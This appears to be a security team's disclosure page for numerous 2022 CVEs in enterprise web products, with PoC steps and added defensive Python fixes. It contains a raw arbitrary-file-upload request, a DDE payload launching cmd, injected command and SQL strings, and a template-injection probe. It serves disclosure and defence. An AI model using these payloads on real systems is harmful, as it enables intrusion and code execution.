POST /[NODE-NAME]/NMSCI-WebGui/SaveFileUploader HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------102436911942005582423300325296
Content-Length: 484
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/system.jsp
Te: trailers
Connection: close
-----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="file"; filename="TEST.sh"
Content-Type: application/x-shellscript
TEST
-----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="fileName"
TEST.sh
-----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="uploadDir"
/home/oam/
-----------------------------102436911942005582423300325296—
Security Impact
By exploiting this vulnerability on the web portal it was possible to upload files to an arbitrary path on the filesystem.
Vulnerability Description: Multiple Improper Access Control – CWE-284
Software Version: 5.2.0-20211008
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39811
CVSv3: 9.1
Severity: Critical
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
Italtel NetMatch-S CI 5.2.0-20211008 has incorrect Access Control under NMSCI-WebGui/advancedsettings.jsp and NMSCI-WebGui/SaveFileUploader. By not verifying permissions for access to resources, it allows an attacker to view pages that are not allowed and to modify the system configuration, bypassing all controls (without checking the user's identity).
Step-by-step instructions and PoC
Any user logged in to the web application can view pages or use functionalities that are normally accessible only to specific roles. In some cases, these functionalities can be accessed even without authentication. This vulnerability can be exploited to gather critical information or to gain unauthorized access to some functionalities.
Affected Endpoints
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/advanced-settings.jsp
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/SaveFileUploader
Below is the evidence with the vulnerability details and the payloads used.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/advanced-settings.jsp
As an example, a user with the “Administrator” role can access the advanced settings page, which is normally available only to “System Administrator” users. This vulnerability can be exploited by simply inserting the appropriate endpoint in the URL.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/SaveFileUploader
We can access the “Upload file” functionality in order to upload arbitrary files on the filesystem without authentication.
Security Impact
By exploiting this vulnerability on the web application it was possible to have unauthorized access to critical information and functionalities.
Vulnerability Description: Cross-Site Scripting - CWE-79
Software Version: 6.4.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39810
CVSv3: 6.1
Severity: Medium
Credits: Tiziano Di Vincenzo, Massimiliano Brolli
An issue was discovered in WSO2 Enterprise Integrator 6.4.0. A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Management Console under /carbon/ndatasource/validateconnection/ajaxprocessor.jsp via the “driver” parameter. Session hijacking or similar attacks would not be possible.
Vulnerability Description: Cross-Site Scripting - CWE-79
Software Version: 6.4.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39809
CVSv3: 6.1
Severity: Medium
Credits: Tiziano Di Vincenzo, Massimiliano Brolli
An issue was discovered in WSO2 Enterprise Integrator 6.4.0. A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Management Console under /carbon/mediation_secure_vault/properties/ajaxprocessor.jsp via the “name” parameter. Session hijacking or similar attacks would not be possible.
Vulnerability Description: Cross-Site Request Forgery (CWE-352)
Software Version: v22.0.0.62
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-30280
CVSv3: 8.8
Severity: High
Credits: Massimiliano Ferraresi, Massimiliano Brolli
/SecurityManagement/html/createuser.jsf in Nokia NetAct 22 allows CSRF. A remote attacker is able to create users with arbitrary privileges, even administrative privileges. The application, even though it issues a CSRF token on a random GET request, never verifies a CSRF token. With a little social engineering/phishing (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
Step-by-step instructions and PoC
It is worth noting that from the admin profile it is possible to add users with various privileges through this endpoint:
· https://hostname/SecurityManagement/html/listusers.jsf
The following image shows the application without the testCSRF profile:
The administrator, who is logged into the application, is induced by means of phishing or social engineering to visit a page containing specific HTML code (csrf2.html).
The administrator's browser then sends the following HTTP request to the NetAct application, which accepts it with arbitrary Origin and Referer headers.
If a logged-in system administrator visits the page containing the malicious JavaScript code crafted by the attacker, the new user testCSRF will appear in the application with admin privileges.
Security Impact
By exploiting this issue, a remote attacker is able to add arbitrary users on Nokia NetAct on behalf of a regular platform administrator.
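The server-side counterpart to the CSRF described above is to require, on every state-changing request, both a per-session token carried by the form and an Origin (or Referer) header that names the application itself; a page hosted elsewhere, such as the csrf2.html above, can make the browser send the request but can supply neither. The Python example below is added here and is not Nokia NetAct code; the site origin, the session dictionary and the form fields are constructed for illustration.

```python
import hmac
import secrets
from typing import Dict, Optional
from urllib.parse import urlsplit

SITE_ORIGIN = "https://hostname"          # constructed deployment value
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_csrf_token(session: dict) -> str:
    """Called when a form page is rendered: one token per session, embedded in
    the form as a hidden field and never readable from another origin."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else ""


def csrf_failure(session: dict, method: str, headers: Dict[str, str], form: Dict[str, str]) -> Optional[str]:
    """Return None if the request may proceed, otherwise the reason to refuse it.

    Two independent checks: the request must come from our own origin (Origin
    header, Referer as fallback, absent counts as foreign), and the token in
    the form must equal the one bound to this session (constant-time compare).
    """
    if method.upper() in SAFE_METHODS:
        return None
    origin = headers.get("Origin") or _origin_of(headers.get("Referer", ""))
    if origin != SITE_ORIGIN:
        return f"cross-site request from {origin or 'unknown origin'}"
    expected = session.get("csrf_token")
    presented = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, presented):
        return "missing or invalid CSRF token"
    return None


def create_user(session: dict, method: str, headers: Dict[str, str], form: Dict[str, str]) -> Optional[dict]:
    """Hypothetical createuser action with the check in front of it; None means refused."""
    if csrf_failure(session, method, headers, form) is not None:
        return None
    return {"username": form["username"], "role": form["role"]}


if __name__ == "__main__":
    session = {"user": "admin"}
    token = issue_csrf_token(session)
    own_site = {"Origin": SITE_ORIGIN}
    print(create_user(session, "POST", own_site, {"csrf_token": token, "username": "new-op", "role": "operator"}))
    print(create_user(session, "POST", {"Origin": "https://attacker.example"}, {"username": "testCSRF", "role": "admin"}))
```

The Origin check alone already stops the scenario above, since the browser sets Origin on cross-site POSTs and scripts cannot forge it; the token is kept as the second line of defence for clients that send neither Origin nor Referer.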
Vulnerability Description: Multiple Cross-Site Scripting - CWE-79
Software Version: 4.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29540
CVSv3: 6.1
Severity: Medium
Credits: Alessandro Bosco, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
RESI Gemini-Net 4.2 is affected by Multiple XSS issues. Unauthenticated remote attackers can inject arbitrary web script or HTML into an HTTP GET parameter that reflects user input without sanitization. This exists on numerous application endpoints.
Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection - CWE-78)
Software Version: 4.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29539
CVSv3: 9.8
Severity: Critical
Credits: Alessandro Bosco, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
RESI Gemini-Net 4.2 is affected by OS Command Injection. It does not properly check the parameters sent as input before they are processed on the server. Due to the lack of validation of user input, an unauthenticated attacker can bypass the syntax intended by the software (e.g., by concatenating commands with `, &, |, ; or \r) and inject arbitrary system commands with the privileges of the application user.
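The defensive counterpart to the command injection described above is to never hand user input to a shell at all: validate the value against a strict allowlist and pass it as a separate argv element, so `, &, |, ; and line breaks have no meaning. The Python example below is added here and is not RESI Gemini-Net code; it assumes a hypothetical diagnostic feature that pings a host name taken from an HTTP parameter.

```python
import re
import subprocess
from typing import List

# Allowlist for a DNS name: labels of letters, digits and hyphens joined by dots.
# Every command separator named in the advisory (`, &, |, ;, CR) and a line feed
# are outside this alphabet, so they are rejected before any command is built.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"(?=.{{1,253}}\Z){_LABEL}(?:\.{_LABEL})*")


def is_valid_hostname(value: str) -> bool:
    """fullmatch, not match: a trailing newline must not slip past the check."""
    return _HOSTNAME_RE.fullmatch(value) is not None


def vulnerable_command_line(host: str) -> str:
    """The CWE-78 pattern: the parameter is spliced into a shell command string.

    Shown only for contrast; nothing in this example executes it.
    """
    return "ping -c 1 " + host


def build_ping_argv(host: str) -> List[str]:
    """argv for subprocess with shell=False: the host is one argument and is
    never parsed for metacharacters by anything."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected host name: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str, timeout: float = 5.0) -> int:
    """Execute the validated command without a shell; returns the exit status."""
    completed = subprocess.run(
        build_ping_argv(host), shell=False, capture_output=True, timeout=timeout, check=False
    )
    return completed.returncode


if __name__ == "__main__":
    print(build_ping_argv("example.com"))
    print(vulnerable_command_line("example.com;id"))   # a shell would see two commands here
    print(is_valid_hostname("example.com;id"))         # False: never reaches argv
```

If a shell really is unavoidable (a legacy wrapper script, for instance), the remaining option is shlex.quote() on each validated value, but the allowlist plus argv form above removes the problem rather than escaping around it.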
Vulnerability Description: Improper Access Control - CWE-284
Software Version: 4.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29538
CVSv3: 5.3
Severity: Medium
Credits: Alessandro Bosco, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
RESI Gemini-Net Web 4.2 is affected by Improper Access Control in authorization logic. An unauthenticated user is able to access some critical resources.
Vulnerability Description: Cross-Site Scripting Stored (Administration of Measurements) – CWE-79
Software Version: v22.0.0.62
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28867
CVSv3: 5.4
Severity: Medium
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in Nokia NetAct 22 through the Administration of Measurements website section. A malicious user can edit or add the templateName parameter in order to include JavaScript code, which is then stored and executed by a victim's web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. Here, the /aom/html/EditTemplate.jsf and /aom/html/ViewAllTemplatesPage.jsf templateName parameter is used.
Step-by-step instructions and PoC
A remote user, authenticated to the NOKIA NetAct Web Page, through the Administration of Measurements web site section, can upload an arbitrary file whose filename contains HTML code, more specifically JavaScript code inside HTML tags.
Affected Endpoints
· URL: https://hostname//aom/html/EditTemplate.jsf
· URL: https://hostname//aom/html/ViewAllTemplatesPage.jsf?tab=3
· Parameter: templateName
Below is the evidence with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
The first step consists in visiting the vulnerable page and injecting the malicious payload as the value of the “Template Name” parameter.
The result is that the JavaScript code is executed, as shown in the following picture.
Security Impact
By exploiting this issue an attacker is able to target administrator users who can access the plugin configuration page within the browser, with several types of direct or indirect impact such as stealing cookies (if the HttpOnly flag is missing from the session cookies), modifying a web page, capturing clipboard contents, keylogging, port scanning, dynamic downloads and other attacks. This type of reflected XSS does require user interaction.
Vulnerability Description: Improper Access Control – CWE-284
Software Version: < R18 Firmware v4.13.00
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28866
CVSv3: 8.8
Severity: High
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
Multiple Improper Access Control issues were discovered in Nokia AirFrame BMC Web GUI < R18 Firmware v4.13.00. It does not properly validate requests for access to (or editing of) data and functionality in all endpoints under /#settings/* and /api/settings/*. By not verifying the permissions for access to resources, it allows a potential attacker to view pages with sensitive data that are not allowed and to modify system configurations (also causing DoS) that should be accessible only to users with an administration profile, bypassing all controls (without checking the user's identity).
Affected Endpoints
· URL: https://[IP]/#settings/ext_users
· URL: https://[IP]/#settings/redundancy
· URL: https://[IP]/#settings/services/edit/2
· URL: https://[IP]/#settings/mouse
· URL: https://[IP]/#settings/log
· URL: https://[IP]/#settings/pef
· URL: https://[IP]/#settings/smtp
· URL: https://[IP]/#settings/ssl
· URL: https://[IP]/#settings/firewall
· URL: https://[IP]/#settings/sol
· URL: https://[IP]/api/settings/*
Step-by-step instructions and PoC
The following images show, as a PoC, some vulnerable endpoints that can be accessed by an unauthorized user:
Fig. 1
Fig. 2
The following steps show that an Operator user is able to edit configuration pages, bypassing both the access controls on the endpoint and the client-side access controls. In this specific case, the endpoint under analysis is https://[IP]/#settings/redundancy.
Fig. 3
As a first step, the disabled controls can be re-enabled by removing the "disabled" attribute from the "select" and "a" tags.
Fig. 4
The next image shows the request sent by the non-privileged Operator user to change the configuration, and its response.
Fig. 5
The last image shows that the Operator user has successfully changed the configuration.
Fig. 6
Vulnerability Description: Cross-Site Scripting Stored (Site Configuration Tools) – CWE-79
Software Version: v22.0.0.62
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28865
CVSv3: 5.4
Severity: Medium
Credits: Andrea Carlo Maria Dattola, Raffaella Robles, Massimiliano Brolli
An issue was discovered in Nokia NetAct 22 through the Site Configuration Tool website section. A malicious user can change a filename of an uploaded file to include JavaScript code, which is then stored and executed by a victim's web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. Here, the /netact/sct filename parameter is used.
Step-by-step instructions and PoC
A remote user, authenticated to the NOKIA NetAct Web Page, through the Site Configuration Tool web site section, can upload an arbitrary file whose filename contains HTML code, more specifically JavaScript code inside HTML tags.
Affected Endpoints
· URL: https://hostname/netact/sct
· HTTP Parameter: filename
Below is the evidence with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
The first step consists in visiting the vulnerable page and injecting the malicious payload through the Unrestricted File Upload vulnerability.
The result is that the JavaScript code is executed, as shown in the following picture.
Security Impact
By exploiting this issue an attacker is able to target administrator users who can access the plugin configuration page within the browser, with several types of direct or indirect impact such as stealing cookies (if the HttpOnly flag is missing from the session cookies), modifying a web page, capturing clipboard contents, keylogging, port scanning, dynamic downloads and other attacks. This type of reflected XSS does require user interaction.
Vulnerability Description: Improper Neutralization of Formula Elements in a CSV File (‘CSV Injection’) – CWE-1236
Software Version: v22.0.0.62
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28864
CVSv3: 8.8
Severity: High
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in Nokia NetAct 22 through the Administration of Measurements website section. A malicious user can edit or add the templateName parameter in order to include malicious code, which is then downloaded as a .csv or .xlsx file and executed on a victim machine. Here, the /aom/html/EditTemplate.jsf and /aom/html/ViewAllTemplatesPage.jsf templateName parameter is used.
Step-by-step instructions and PoC
A remote user, authenticated to the Nokia NetAct Web Page, through the Administration of Measurements web site section, can submit the payload =50+60+cmd|' /C calc '!A0 as the templateName of the component domain objects.
Affected Endpoints
· URL: https://hostname//aom/html/EditTemplate.jsf
· URL: https://hostname//aom/html/ViewAllTemplatesPage.jsf
· Parameter: templateName
The following request shows the vulnerable templateName parameter, into which the malicious content is injected, in the /aom/html/EditTemplate.jsf POST request:
The image below shows the operation the victim performs when choosing to export the malicious content in CSV format.
The following image shows that the export request does not sanitize the malicious content when the CSV file is downloaded through the /aom/html/ViewAllTemplatesPage.jsf POST request.
As shown in the next screenshot, the malicious payload is finally executed: in our specific case the administrator's machine opens Microsoft Calculator.
Security Impact
By exploiting this issue an attacker is able to inject arbitrary formulas into CSV files.
This can potentially lead to remote code execution at client side (DDE) or to data leakage via maliciously injected hyperlinks.
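The export-side fix for CSV injection is to make sure no cell can be evaluated by the spreadsheet that opens the file: prefix values beginning with =, +, -, @, tab or carriage return with an apostrophe (the spreadsheet convention for "text"), and quote every field so embedded separators cannot start a new cell. The Python example below is added here and is not Nokia NetAct code; it runs the payload quoted above through a constructed templates export and checks the result the way a consumer would parse it.

```python
import csv
import io
from typing import Dict, Iterable, List

# Leading characters that Excel, LibreOffice and similar treat as the start of a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value) -> str:
    """Force a cell to be interpreted as text.

    Leading spaces are removed first because some importers trim them before
    deciding whether a cell is a formula; a leading apostrophe then makes
    =50+60+cmd|' /C calc '!A0 display literally instead of being evaluated.
    """
    text = "" if value is None else str(value)
    stripped = text.lstrip(" ")
    if stripped and stripped[0] in FORMULA_TRIGGERS:
        return "'" + stripped
    return text


def export_templates(rows: Iterable[Dict[str, str]], fieldnames: List[str]) -> str:
    """Write rows as CSV with every field quoted and every cell neutralized."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({name: neutralize_cell(row.get(name)) for name in fieldnames})
    return buf.getvalue()


def read_back(csv_text: str) -> List[Dict[str, str]]:
    """Parse CSV text as a consumer would; used to verify the export."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def has_live_formula(csv_text: str) -> bool:
    """True if any parsed cell still starts with a formula trigger."""
    for row in read_back(csv_text):
        for cell in row.values():
            if cell and cell.lstrip(" ")[:1] in FORMULA_TRIGGERS:
                return True
    return False


# Constructed sample rows; the first templateName is the payload from the advisory.
SAMPLE_ROWS = [
    {"templateName": "=50+60+cmd|' /C calc '!A0", "owner": "tester"},
    {"templateName": "Daily KPI template", "owner": "ops"},
    {"templateName": "-10 dB threshold", "owner": "rf-team"},
]

if __name__ == "__main__":
    print(export_templates(SAMPLE_ROWS, ["templateName", "owner"]))
```

The apostrophe is visible to a human reading the file in a text editor, which is the accepted trade-off; the alternative of refusing such values at input time is also reasonable where, as with a template name, a leading = or + has no legitimate use.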
Vulnerability Description: Unrestricted Upload of File with Dangerous Type – CWE-434
Software Version: v22.0.0.62
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28863
CVSv3: 8.8
Severity: High
Credits: Andrea Carlo Maria Dattola, Raffaella Robles, Massimiliano Brolli
An issue was discovered in Nokia NetAct 22. A remote user, authenticated to the website, can visit the Site Configuration Tool section and arbitrarily upload potentially dangerous files without restrictions via the /netact/sct dir parameter in conjunction with the operation=upload value.
Step-by-step instructions and PoC
A remote user, authenticated to the NOKIA NetAct Web Page, through the Site Configuration Tool web site section, can upload arbitrary, potentially dangerous files without restrictions.
Affected Endpoints
· URL: https://hostname/netact/sct
· HTTP Parameter: operation, dir
Below is the evidence with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
The first step consists in uploading an arbitrary file to the machine through the affected URL. In this specific case a text file containing the EICAR test string was uploaded; this string simulates malware that is recognized by all antivirus solutions.
The next picture shows that the file has been successfully uploaded.
For further information about EICAR: https://www.eicar.org/?page_id=3950
Security Impact
This vulnerability would allow an attacker to exploit the platform by injecting malware and, under certain conditions, to execute code in the remote machine.
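The control missing from the Site Configuration Tool upload is a server-side policy on what may be stored at all: a short allowlist of extensions, a check that the content matches the claimed type, a size cap, and a storage name that is generated rather than taken from the request (which also removes the file-name XSS vector of CVE-2022-28865 above). The Python example below is added here and is not Nokia NetAct code; the allowed types, magic bytes and size limit are assumptions for illustration.

```python
import os
import secrets
from typing import Dict, NamedTuple, Tuple

# Hypothetical policy: extension -> (magic bytes, expected Content-Type).
ALLOWED_TYPES: Dict[str, Tuple[bytes, str]] = {
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "pdf": (b"%PDF-", "application/pdf"),
    "csv": (b"", "text/csv"),          # no magic; still bound to its Content-Type
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024


class UploadResult(NamedTuple):
    accepted: bool
    reason: str
    stored_name: str   # empty when rejected


def validate_upload(filename: str, content: bytes, declared_type: str) -> UploadResult:
    """Decide whether an upload may be stored, and under which generated name.

    Every decision is taken from the bytes and the policy, never from what the
    client claims: the extension must be allowlisted, the content must carry
    the matching magic, the declared type must agree, and the original name
    (which may contain anything, including HTML) never reaches disk or a page.
    """
    if len(content) > MAX_UPLOAD_BYTES:
        return UploadResult(False, "too large", "")
    # Only the last path component counts; directories in the name are ignored.
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return UploadResult(False, "no extension", "")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return UploadResult(False, f"extension not allowed: {ext}", "")
    magic, mime = ALLOWED_TYPES[ext]
    if declared_type.split(";")[0].strip().lower() != mime:
        return UploadResult(False, "content type mismatch", "")
    if magic and not content.startswith(magic):
        return UploadResult(False, "content does not match extension", "")
    if ext == "csv" and b"\x00" in content:
        return UploadResult(False, "binary data in text upload", "")
    return UploadResult(True, "ok", f"{secrets.token_hex(16)}.{ext}")


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print(validate_upload("scan.png", png, "image/png"))
    print(validate_upload("run.sh", b"#!/bin/sh\n", "application/x-shellscript"))
```

Storing under a random name in a directory the web server does not execute from is the other half of the control; the returned stored_name is what the application records next to the user-supplied display name, which is then shown only through output encoding.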
Vulnerability Description: SQL Injection Multiple Vulnerabilities - CWE-89
Software Version: <26.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28862
CVSv3: 9.8
Severity: Critical
Credits: Claudio Rizzo, Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli
In ARCHIBUS Web Central <26.2, multiple SQL Injection vulnerabilities occur in /archibus/dwr/call/plaincall/workflow.runWorkflowRule.dwr. Through the injection of arbitrary SQL statements, a potential attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.
NOTE: This vulnerability is fixed in all versions, even those that are no longer supported by the maintainer.
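The fix for SQL injection in an endpoint such as workflow.runWorkflowRule.dwr is the same as anywhere else: client data is bound to placeholders after the statement has been parsed, so it can only ever be a value. The Python example below is added here and is not ARCHIBUS code; it uses an in-memory SQLite database with a constructed workflow_rule table and shows the concatenation pattern beside the parameterized one.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed sample schema and rows (hypothetical, not the product's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE workflow_rule (id INTEGER PRIMARY KEY, name TEXT NOT NULL, owner TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO workflow_rule (name, owner) VALUES (?, ?)",
        [("nightly-report", "alice"), ("cleanup", "bob"), ("audit-export", "alice")],
    )
    conn.commit()
    return conn


def rules_for_owner_unsafe(conn: sqlite3.Connection, owner: str) -> List[str]:
    """CWE-89: the parameter becomes part of the SQL text, so a quote inside it
    changes the grammar of the statement instead of the value being compared."""
    sql = "SELECT name FROM workflow_rule WHERE owner = '" + owner + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def rules_for_owner(conn: sqlite3.Connection, owner: str) -> List[str]:
    """Parameterized form: the driver sends the statement and the value separately,
    so whatever the string contains is compared literally against the column."""
    sql = "SELECT name FROM workflow_rule WHERE owner = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (owner,))]


if __name__ == "__main__":
    db = make_db()
    print(rules_for_owner(db, "alice"))
    print(rules_for_owner(db, "' OR '1'='1"))          # []: treated as a literal owner name
    print(rules_for_owner_unsafe(db, "' OR '1'='1"))   # every row: the WHERE clause was rewritten
```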
Vulnerability Description: Stored Cross-Site Scripting - CWE-79
Software Version: 5.1.0, 5.2.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-27880
CVSv3: 4.8
Severity: Medium
Credits: Valerio Alessandroni, Matteo Brutti, Massimiliano Brolli
The web application of F5 SDC does not properly check the parameters sent as input in HTTP requests before saving them on the server. In addition, the malicious JavaScript content is then reflected back to the end user and executed by the web browser.
Step-by-step instructions and PoC
An authenticated remote user can inject arbitrary code aiming to trigger malicious JavaScript code on browsers that visit infected pages.
Affected Endpoints
Malicious javascript code is injected through the parameter “User Name” as shown below:
Figure 1
The previously injected malicious code is stored within the page.
Figure 2
Vulnerability Description: Stored Client-Side Template Injection-CWE-1336
Software Version: 5.1.0, 5.2.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-27662
CVSv3: 4.8
Severity: Medium
Credits: Valerio Alessandroni, Matteo Brutti, Massimiliano Brolli
In Traffix Signal Delivery Controller 5.1.0 and 5.2.0, stored client-side template injection (CSTI) was possible, which could lead to code execution.
Step-by-step instructions and PoC
An authenticated remote user can inject arbitrary code aiming to exploit the template engine to execute malicious javascript code on browsers which visit infected pages.
Affected Endpoints
Malicious JavaScript code is injected through the parameter “User Name”, inserting an operation (e.g., in this case {{7*7}}) to be executed by the victim’s browser, as shown below:
Figure 1
The previously injected malicious code is stored within the page and executed as the page is loaded in the browser.
Figure 2
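The two F5 SDC issues above (stored XSS and stored client-side template injection through the same “User Name” field) call for two different controls, and it is worth seeing why one is not enough: HTML output encoding defuses a <script> payload but leaves {{7*7}} untouched, so a page that is later compiled by a client-side template engine still evaluates it. The Python example below is added here and is not F5 or Traffix code; the name length limit and the rejected characters are assumptions for illustration. The output-encoding half applies equally to the reflected XSS entries elsewhere on this page (WSO2, RESI, Veritas).

```python
import html
import re
from typing import Optional

# Delimiters used by common client-side template engines (Angular/Vue style {{ }}
# and Jinja/Django style {% %}); a display name has no reason to contain them.
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.DOTALL)
FORBIDDEN_CHARS = set("<>{}")
MAX_NAME_LEN = 64


def render_user_name(value: str) -> str:
    """Output encoding for an HTML text node or quoted attribute value."""
    return html.escape(value, quote=True)


def contains_template_expression(value: str) -> bool:
    return TEMPLATE_EXPR.search(value) is not None


def user_name_rejection(value: str) -> Optional[str]:
    """Input policy applied when the value is stored; None means accepted.

    Output encoding alone does not stop CSTI, so template delimiters are
    refused at write time rather than trusting every page that renders the name.
    """
    if not value.strip():
        return "empty"
    if len(value) > MAX_NAME_LEN:
        return "too long"
    if contains_template_expression(value):
        return "template expression"
    bad = sorted(FORBIDDEN_CHARS.intersection(value))
    if bad:
        return "forbidden characters: " + "".join(bad)
    return None


def store_user_name(value: str, store: dict, user_id: str) -> bool:
    """Store only accepted names; a rejected value is never written."""
    if user_name_rejection(value) is not None:
        return False
    store[user_id] = value
    return True


if __name__ == "__main__":
    print(render_user_name("<script>alert(1)</script>"))
    print(render_user_name("{{7*7}}"))      # unchanged: escaping does not help here
    print(user_name_rejection("{{7*7}}"))   # template expression
```

Where the framework allows it, rendering user data with a binding that is explicitly not compiled (the equivalent of Angular's ng-non-bindable or a text-only binding) is the rendering-side control for CSTI; the input policy above is the server-side one and does not depend on the front end.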
Vulnerability Description: Absolute Path Traversal – CWE-36
Software Version: 6.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-26484
CVSv3: 4.9
Severity: Medium
Credits: Luca Carbone, Antonio Papa, Vincenzo Nigro, Massimiliano Brolli
The web server fails to sanitize the input data allowing a remote authenticated attacker to read arbitrary files on the system. By manipulating the resource name in the GET requests referring to files with absolute paths, it is possible to access arbitrary files stored on the filesystem, including application source code, configuration files and critical system files.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') - CWE-79
Software Version: 6.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-26483
CVSv3: 4.8
Severity: Medium
Credits: Luca Carbone, Antonio Papa, Vincenzo Nigro, Massimiliano Brolli
A Reflected Cross-Site Scripting (XSS) vulnerability affects the Veritas Operations Manager application, allowing authenticated remote attackers to inject arbitrary web script or HTML into HTTP GET parameters that reflect the user input without sanitization.
The Veritas Operations Manager web application does not properly check parameters sent via GET methods which are included in the server response.
Vulnerability Description: CWE-79: Cross-Site Scripting Stored
Software Version: Firmware 2XD_S000.002.271
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-25344
CVSv3: 6.1
Severity: Medium
Credits: Mattia Campanelli, Luca Carbone, Massimiliano Brolli
An issue was discovered on Olivetti d-COLOR MF3555 2XD_S000.002.271 devices. The Web Application doesn't properly check parameters, sent in a /dvcset/sysset/set.cgi POST request via the arg01.Hostname field, before saving them on the server. In addition, the JavaScript malicious content is then reflected back to the end user and executed by the web browser.
NOTE: This vulnerability has been fixed in the available firmware version 2XD_S000.002.703 from January 17th, 2022 and later versions.
Step-by-step instructions and PoC
The vulnerable functionality can be reached through the following actions:
Affected Endpoints
Below is the evidence with the vulnerability details and the payloads used.
Figure 1: Administrative page to change the Host name
Figure 2: The malicious payload will be URL encoded, to bypass the client-side filters
Figure 3: Stored JavaScript code on the /jobs page
Vulnerability Description: CWE-400: Denial of Service
Software Version: Firmware 2XD_S000.002.271
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-25343
CVSv3: 7.5
Severity: High
Credits: Mattia Campanelli, Luca Carbone, Massimiliano Brolli
An issue was discovered on Olivetti d-COLOR MF3555 2XD_S000.002.271 devices. The Web Application is affected by Denial of Service. An unauthenticated attacker, who can send POST requests to the /download/set.cgi page by manipulating the failhtmfile variable, is able to cause interruption of the service provided by the Web Application.
NOTE: This vulnerability has been fixed in the available firmware version 2XD_S000.002.703 from January 17th, 2022 and later versions.
Step-by-step instructions and PoC
The vulnerability is triggered by an unauthenticated POST request to the /download/set.cgi page. The web application goes into a system error when the failhtmfile variable is manipulated by adding a relative path to a non-existent file; most of the common path traversal payloads work:
…and so on.
After that, all the resources of the Web Application will answer 404 Not Found, until the printer is restarted.
Affected Endpoints
Below is the evidence with the vulnerability details and the payloads used.
Figure 1: System error - 404 Not Found on all resources
